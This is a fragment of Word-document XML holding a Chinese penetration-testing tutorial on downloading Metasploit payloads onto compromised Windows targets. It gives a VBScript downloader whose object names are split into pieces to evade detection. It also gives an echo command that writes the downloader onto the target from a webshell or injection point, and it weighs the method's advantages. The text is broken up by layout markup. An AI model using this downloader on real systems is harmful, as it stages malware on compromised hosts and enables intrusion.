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49.874pt;width:4.125pt;height:46.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,6997" coordsize="82,922">
        <v:shape style="position:absolute;left:1177;top:6997;width:82;height:922" coordorigin="1177,6997" coordsize="82,922" path="m1217,7003l1217,7003,1217,7003,1217,7003,1217,7003,1217,7003,1217,7003,1217,7003,1217,7003,1217,7003,1217,7003,1217,7003,1217,7003,1217,7003,1217,7004,1217,7004,1217,7004,1217,7005,1217,7005,1217,7006,1217,7006,1217,7007,1217,7007,1217,7008,1217,7009,1217,7010,1217,7011,1217,7012,1217,7013,1217,7014,1217,7016,1217,7017,1217,7018,1217,7020,1217,7022,1217,7024,1217,7025,1217,7027,1217,7030,1217,7032,1217,7034,1217,7037,1217,7039,1217,7042,1217,7045,1217,7048,1217,7051,1217,7055,1217,7058,1217,7062,1217,7065,1217,7069,1217,7073,1217,7078,1217,7082,1217,7087,1217,7091,1217,7096,1217,7101,1217,7107,1217,7112,1217,7118,1217,7124,1217,7130,1217,7136,1217,7143,1217,7149,1217,7156,1217,7163,1217,7171,1217,7178,1217,7186,1217,7194,1217,7202,1217,7210,1217,7219,1217,7228,1217,7237,1217,7246,1217,7256,1217,7266,1217,7276,1217,7286,1217,7297,1217,7308,1217,7319,1217,7331,1217,7342,1217,7354,1217,7367,1217,7379,1217,7392,1217,7405,1217,7419,1217,7432,1217,7446,1217,7461,1217,7475,1217,7490,1217,7505,1217,7521,1217,7537,1217,7553,1217,7570,1217,7586,1217,7604,1217,7621,1217,7639,1217,7657,1217,7676,1217,7695,1217,7714,1217,7733,1217,7753,1217,7774,1217,7794,1217,7815,1217,7837,1217,7858,1217,7880,1217,7903e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:73.874pt;margin-top:435.874pt;width:450.125pt;height:21.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1477,8717" coordsize="9002,422">
        <v:shape style="position:absolute;left:1477;top:8717;width:9002;height:422" coordorigin="1477,8717" coordsize="9002,422" path="m1510,8743l1510,8743,1510,8743,1510,8743,1510,8743,1510,8743,1510,8743,1511,8743,1512,8743,1512,8743,1514,8743,1515,8743,1517,8743,1519,8743,1521,8743,1524,8743,1528,8743,1532,8743,1536,8743,1541,8743,1546,8743,1552,8743,1559,8743,1566,8743,1575,8743,1583,8743,1593,8743,1603,8743,1615,8743,1627,8743,1640,8743,1654,8743,1668,8743,1684,8743,1701,8743,1719,8743,1738,8743,1758,8743,1780,8743,1802,8743,1826,8743,1851,8743,1877,8743,1904,8743,1933,8743,1963,8743,1995,8743,2028,8743,2063,8743,2099,8743,2136,8743,2175,8743,2216,8743,2259,8743,2303,8743,2348,8743,2396,8743,2445,8743,2496,8743,2549,8743,2604,8743,2660,8743,2719,8743,2779,8743,2841,8743,2906,8743,2972,8743,3041,8743,3112,8743,3184,8743,3259,8743,3336,8743,3416,8743,3498,8743,3582,8743,3668,8743,3757,8743,3848,8743,3941,8743,4037,8743,4136,8743,4236,8743,4340,8743,4446,8743,4555,8743,4666,8743,4780,8743,4897,8743,5017,8743,5139,8743,5264,8743,5392,8743,5523,8743,5657,8743,5793,8743,5933,8743,6076,8743,6222,8743,6370,8743,6522,8743,6677,8743,6835,8743,6997,8743,7161,8743,7329,8743,7500,8743,7675,8743,7853,8743,8034,8743,8219,8743,8407,8743,8598,8743,8793,8743,8992,8743,9194,8743,9400,8743,9609,8743,9823,8743,10039,8743,10260,8743,10484,8743,10484,8743,10484,8743,10484,8743,10484,8743,10484,8743,10484,8743,10484,8743,10484,8743,10484,8744,10484,8744,10484,8744,10484,8744,10484,8744,10484,8744,10484,8744,10484,8744,10484,8744,10484,8745,10484,8745,10484,8745,10484,8745,10484,8746,10484,8746,10484,8746,10484,8747,10484,8747,10484,8748,10484,8748,10484,8749,10484,8749,10484,8750,10484,8751,10484,8751,10484,8752,10484,8753,10484,8754,10484,8755,10484,8756,10484,8757,10484,8758,10484,8759,10484,8760,10484,8761,10484,8763,10484,8764,10484,8765,10484,8767,10484,8768,10484,8770,10484,8772,10484,8773,10484,8775,10484,8777,10484,8779,10484,8781,10484,8783,10484,8786,10484,8788,10484,8790,10484,8793,10484,8795,10484,8798,10484,8801,10484,8804,10484,8806,10484,8809,10484,8813,10484,8816,10484,8819,10484,8822,10484,8826,10484,8829,10484,8833,10484,8837,10484,8841,10484,8845,10484,8849,10484,8853,10484,8858,10484,8862,10484,8867,10484,8871,10484,8876,10484,8881,10484,8886,10484,8891,10484,8896,10484,8902,10484,8907,10484,8913,10484,8919,10484,8925,10484,8931,10484,8937,10484,8943,10484,8950,10484,8956,10484,8963,10484,8970,10484,8977,10484,8984,10484,8991,10484,8999,10484,9006,10484,9014,10484,9022,10484,9030,10484,9038,10484,9046,10484,9055,10484,9063,10484,9072,10484,9081,10484,9090,10484,9100,10484,9109,10484,9119,10484,9129,10484,9138,10484,9149,10484,9149,10484,9149,10484,9149,10484,9149,10484,9149,10484,9149,10483,9149,10482,9149,10482,9149,10480,9149,10479,9149,10477,9149,10475,9149,10473,9149,10470,9149,10466,9149,10462,9149,10458,9149,10453,9149,10448,9149,10442,9149,10435,9149,10428,9149,10419,9149,10411,9149,10401,9149,10391,9149,10379,9149,10367,9149,10354,9149,10340,9149,10326,9149,10310,9149,10293,9149,10275,9149,10256,9149,10236,9149,10215,9149,10192,9149,10168,9149,10143,9149,10117,9149,10090,9149,10061,9149,10031,9149,9999,9149,9966,9149,9931,9149,9895,9149,9858,9149,9819,9149,9778,9149,9735,9149,9691,9149,9646,9149,9598,9149,9549,9149,9498,9149,9445,9149,9391,9149,9334,9149,9275,9149,9215,9149,9153,9149,9088,9149,9022,9149,8953,9149,8883,9149,8810,9149,8735,9149,8658,9149,8578,9149,8497,9149,8413,9149,8326,9149,8238,9149,8146,9149,8053,9149,7957,9149,7859,9149,7758,9149,7654,9149,7548,9149,7439,9149,7328,9149,7214,9149,7097,9149,6977,9149,6855,9149,6730,9149,6602,9149,6471,9149,6337,9149,6201,9149,6061,9149,5918,9149,5773,9149,5624,9149,5472,9149,5317,9149,5159,9149,4997,9149,4833,9149,4665,9149,4494,9149,4319,9149,4141,9149,3960,9149,3776,9149,3587,9149,3396,9149,3201,9149,3002,9149,2800,9149,2594,9149,2385,9149,2172,9149,1955,9149,1734,9149,1510,9149,1510,9149,1510,9149,1510,9149,1510,9149,1510,9149,1510,9149,1510,9149,1510,9149,1510,9148,1510,9148,1510,9148,1510,9148,1510,9148,1510,9148,1510,9148,1510,9148,1510,9148,1510,9147,1510,9147,1510,9147,1510,9147,1510,9146,1510,9146,1510,9146,1510,9145,1510,9145,1510,9144,1510,9144,1510,9143,1510,9143,1510,9142,1510,9141,1510,9141,1510,9140,1510,9139,1510,9138,1510,9137,1510,9136,1510,9135,1510,9134,1510,9133,1510,9132,1510,9131,1510,9129,1510,9128,1510,9127,1510,9125,1510,9124,1510,9122,1510,9120,1510,9119,1510,9117,1510,9115,1510,9113,1510,9111,1510,9109,1510,9106,1510,9104,1510,9102,1510,9099,1510,9097,1510,9094,1510,9091,1510,9088,1510,9086,1510,9083,1510,9079,1510,9076,1510,9073,1510,9070,1510,9066,1510,9063,1510,9059,1510,9055,1510,9051,1510,9047,1510,9043,1510,9039,1510,9035,1510,9030,1510,9025,1510,9021,1510,9016,1510,9011,1510,9006,1510,9001,1510,8996,1510,8990,1510,8985,1510,8979,1510,8973,1510,8967,1510,8961,1510,8955,1510,8949,1510,8942,1510,8936,1510,8929,1510,8922,1510,8915,1510,8908,1510,8901,1510,8893,1510,8886,1510,8878,1510,8870,1510,8862,1510,8854,1510,8846,1510,8837,1510,8829,1510,8820,1510,8811,1510,8802,1510,8792,1510,8783,1510,8773,1510,8763,1510,8754,1510,8743e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:435.600pt;width:445.800pt;height:21.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId7" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:477.600pt;width:467.400pt;height:194.4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23" w:firstLine="483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一次m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sf完整的流程离不开目标机的payload下载与执行。而针对不同环境目标，考虑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或者选择不同方式的payloa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d下载与执行。如webshell下，注入点下。smb下等。而针对不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同的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>实际环境，来做最好的选择。</w:t>
      </w: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既然本季开始专门针对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windows下的payload下载讲解，那么就需要考虑到目标机的系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统版本，是windows2000，windows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2003，或者是更高的版本如windows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2016等。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无论是哪个版本的windows系列，都是支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持vbs的。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靶机：windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-51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vb</w:t>
      </w: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s：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保存downfile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.vbs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="75" w:after="0" w:line="263" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="126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set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a=createobject("adod"+"b.stream"):set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w=createobject("micro"+"soft.xmlhttp"):w.open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"get",wsh.arguments(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0),0:w.send:a.type=1:a.open:a.write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w.responsebody:a.savetofile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wsh.argum</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ents(1),2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="24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命</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>令行下执行：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cscript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downfile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vbs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robots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\Inetpub\b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txt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往往在实战中，没有上传的方便条件，尤其是目标机是window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s，只有echo方式来写入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vb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s。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命</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>令行下执行：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49.874pt;width:4.125pt;height:61.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,997" coordsize="82,1222">
        <v:shape style="position:absolute;left:1177;top:997;width:82;height:1222" coordorigin="1177,997" coordsize="82,1222" path="m1217,1000l1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1000,1217,1001,1217,1001,1217,1001,1217,1002,1217,1002,1217,1003,1217,1004,1217,1004,1217,1005,1217,1006,1217,1007,1217,1008,1217,1009,1217,1011,1217,1012,1217,1014,1217,1015,1217,1017,1217,1019,1217,1021,1217,1023,1217,1025,1217,1028,1217,1030,1217,1033,1217,1036,1217,1039,1217,1042,1217,1045,1217,1049,1217,1052,1217,1056,1217,1060,1217,1064,1217,1069,1217,1073,1217,1078,1217,1083,1217,1089,1217,1094,1217,1100,1217,1106,1217,1112,1217,1118,1217,1125,1217,1131,1217,1139,1217,1146,1217,1153,1217,1161,1217,1169,1217,1178,1217,1186,1217,1195,1217,1204,1217,1214,1217,1224,1217,1234,1217,1244,1217,1254,1217,1265,1217,1277,1217,1288,1217,1300,1217,1312,1217,1325,1217,1338,1217,1351,1217,1364,1217,1378,1217,1392,1217,1407,1217,1422,1217,1437,1217,1453,1217,1469,1217,1485,1217,1502,1217,1519,1217,1536,1217,1554,1217,1573,1217,1591,1217,1610,1217,1630,1217,1650,1217,1670,1217,1691,1217,1712,1217,1734,1217,1756,1217,1778,1217,1801,1217,1824,1217,1848,1217,1872,1217,1897,1217,1922,1217,1948,1217,1974,1217,2000,1217,2028,1217,2055,1217,2083,1217,2112,1217,2141,1217,2170,1217,2200e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:453.874pt;margin-top:243.874pt;width:5.125pt;height:5.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="9077,4877" coordsize="102,102">
        <v:shape style="position:absolute;left:9077;top:4877;width:102;height:102" coordorigin="9077,4877" coordsize="102,102" path="m9194,4946l9194,4946,9194,4947,9194,4948,9194,4949,9194,4949,9194,4950,9194,4951,9193,4952,9193,4952,9193,4953,9193,4954,9193,4954,9193,4955,9193,4956,9193,4956,9193,4957,9193,4958,9193,4958,9193,4959,9192,4960,9192,4960,9192,4961,9192,4962,9192,4962,9192,4963,9192,4963,9191,4964,9191,4965,9191,4965,9191,4966,9191,4966,9191,4967,9190,4967,9190,4968,9190,4969,9190,4969,9190,4970,9189,4970,9189,4971,9189,4971,9189,4972,9188,4972,9188,4973,9188,4973,9187,4974,9187,4974,9187,4975,9187,4975,9186,4975,9186,4976,9186,4976,9185,4977,9185,4977,9185,4978,9184,4978,9184,4978,9184,4979,9183,4979,9183,4980,9183,4980,9182,4980,9182,4981,9181,4981,9181,4982,9181,4982,9180,4982,9180,4983,9179,4983,9179,4983,9178,4984,9178,4984,9178,4984,9177,4984,9177,4985,9176,4985,9176,4985,9175,4986,9175,4986,9174,4986,9174,4986,9173,4987,9173,4987,9172,4987,9172,4987,9171,4988,9171,4988,9170,4988,9170,4988,9169,4988,9168,4989,9168,4989,9167,4989,9167,4989,9166,4989,9166,4990,9165,4990,9164,4990,9164,4990,9163,4990,9162,4990,9162,4990,9161,4990,9161,4991,9160,4991,9159,4991,9159,4991,9158,4991,9157,4991,9157,4991,9156,4991,9155,4991,9154,4991,9154,4991,9153,4991,9152,4991,9152,4991,9151,4991,9150,4992,9149,4992,9149,4992,9149,4992,9148,4992,9147,4992,9146,4991,9146,4991,9145,4991,9144,4991,9143,4991,9143,4991,9142,4991,9141,4991,9141,4991,9140,4991,9139,4991,9139,4991,9138,4991,9137,4991,9137,4991,9136,4990,9135,4990,9135,4990,9134,4990,9134,4990,9133,4990,9132,4990,9132,4990,9131,4989,9130,4989,9130,4989,9129,4989,9129,4989,9128,4988,9128,4988,9127,4988,9127,4988,9126,4988,9125,4987,9125,4987,9124,4987,9124,4987,9123,4986,9123,4986,9122,4986,9122,4986,9121,4985,9121,4985,9121,4985,9120,4984,9120,4984,9119,4984,9119,4984,9118,4983,9118,4983,9117,4983,9117,4982,9117,4982,9116,4982,9116,4981,9115,4981,9115,4980,9115,4980,9114,4980,9114,4979,9114,4979,9113,4978,9113,4978,9113,4978,9112,4977,9112,4977,9112,4976,9111,4976,9111,4975,9111,4975,9110,4975,9110,4974,9110,4974,9109,4973,9109,4973,9109,4972,9109,4972,9108,4971,9108,4971,9108,4970,9108,4970,9107,4969,9107,4969,9107,4968,9107,4967,9107,4967,9106,4966,9106,4966,9106,4965,9106,4965,9106,4964,9106,4963,9105,4963,9105,4962,9105,4962,9105,4961,9105,4960,9105,4960,9105,4959,9105,4958,9104,4958,9104,4957,9104,4956,9104,4956,9104,4955,9104,4954,9104,4954,9104,4953,9104,4952,9104,4952,9104,4951,9104,4950,9104,4949,9104,4949,9104,4948,9104,4947,9104,4946,9104,4946,9104,4946,9104,4945,9104,4944,9104,4944,9104,4943,9104,4942,9104,4941,9104,4941,9104,4940,9104,4939,9104,4939,9104,4938,9104,4937,9104,4937,9104,4936,9104,4935,9105,4935,9105,4934,9105,4933,9105,4933,9105,4932,9105,4931,9105,4931,9105,4930,9106,4930,9106,4929,9106,4928,9106,4928,9106,4927,9106,4927,9107,4926,9107,4926,9107,4925,9107,4924,9107,4924,9108,4923,9108,4923,9108,4922,9108,4922,9109,4921,9109,4921,9109,4920,9109,4920,9110,4919,9110,4919,9110,4918,9111,4918,9111,4917,9111,4917,9112,4917,9112,4916,9112,4916,9113,4915,9113,4915,9113,4914,9114,4914,9114,4914,9114,4913,9115,4913,9115,4913,9115,4912,9116,4912,9116,4911,9117,4911,9117,4911,9117,4910,9118,4910,9118,4910,9119,4909,9119,4909,9120,4909,9120,4908,9121,4908,9121,4908,9121,4908,9122,4907,9122,4907,9123,4907,9123,4907,9124,4906,9124,4906,9125,4906,9125,4906,9126,4905,9127,4905,9127,4905,9128,4905,9128,4905,9129,4904,9129,4904,9130,4904,9130,4904,9131,4904,9132,4903,9132,4903,9133,4903,9134,4903,9134,4903,9135,4903,9135,4903,9136,4902,9137,4902,9137,4902,9138,4902,9139,4902,9139,4902,9140,4902,9141,4902,9141,4902,9142,4902,9143,4902,9143,4902,9144,4902,9145,4902,9146,4902,9146,4901,9147,4901,9148,4901,9149,4901,9149,4901,9149,4901,9150,4901,9151,4901,9152,4902,9152,4902,9153,4902,9154,4902,9154,4902,9155,4902,9156,4902,9157,4902,9157,4902,9158,4902,9159,4902,9159,4902,9160,4902,9161,4902,9161,4902,9162,4903,9162,4903,9163,4903,9164,4903,9164,4903,9165,4903,9166,4903,9166,4904,9167,4904,9167,4904,9168,4904,9168,4904,9169,4905,9170,4905,9170,4905,9171,4905,9171,4905,9172,4906,9172,4906,9173,4906,9173,4906,9174,4907,9174,4907,9175,4907,9175,4907,9176,4908,9176,4908,9177,4908,9177,4908,9178,4909,9178,4909,9178,4909,9179,4910,9179,4910,9180,4910,9180,4911,9181,4911,9181,4911,9181,4912,9182,4912,9182,4913,9183,4913,9183,4913,9183,4914,9184,4914,9184,4914,9184,4915,9185,4915,9185,4916,9185,4916,9186,4917,9186,4917,9186,4917,9187,4918,9187,4918,9187,4919,9187,4919,9188,4920,9188,4920,9188,4921,9189,4921,9189,4922,9189,4922,9189,4923,9190,4923,9190,4924,9190,4924,9190,4925,9190,4926,9191,4926,9191,4927,9191,4927,9191,4928,9191,4928,9191,4929,9192,4930,9192,4930,9192,4931,9192,4931,9192,4932,9192,4933,9192,4933,9193,4934,9193,4935,9193,4935,9193,4936,9193,4937,9193,4937,9193,4938,9193,4939,9193,4939,9193,4940,9193,4941,9193,4941,9194,4942,9194,4943,9194,4944,9194,4944,9194,4945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,9194,4946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1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2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>echo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="19"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>a=createobject(^"adod^"+^"b.stream^"):set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w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-38"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>^"get^",wsh.arguments(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="23" w:after="0" w:line="263" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="2002" w:firstLine="0"/>
      </w:pP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0),0:w.send:a.type=1:a.open:a.write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w.responsebody:a.savetofile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wsh.arguments(1),2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7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;&gt;downfile.v</w:t>
      </w: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bs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9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7391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优点：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支持windo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ws全版本系列</w:t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缺点：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对http</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s不友好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